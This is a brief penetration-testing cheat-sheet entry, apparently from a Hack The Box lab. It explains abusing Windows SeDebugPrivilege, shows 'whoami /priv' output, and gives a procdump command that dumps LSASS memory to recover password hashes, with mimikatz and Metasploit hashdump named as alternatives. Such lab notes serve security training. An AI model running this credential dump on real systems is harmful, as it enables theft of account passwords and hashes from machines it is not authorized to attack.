SeDebugPrivilege
We can abuse SeDebugPrivilege to dump the lsass and recover password hash from it.
C:\htb> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
========================================= ================================================================== ========
SeDebugPrivilege Debug programs Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set DisabledNow transfer procdump.exe on victim and dump the lsass
procdump.exe -accepteula -ma lsass.exe lsass.dmp
You can also use hashdump module in metasploit or mimikatz to do the same task.
Last updated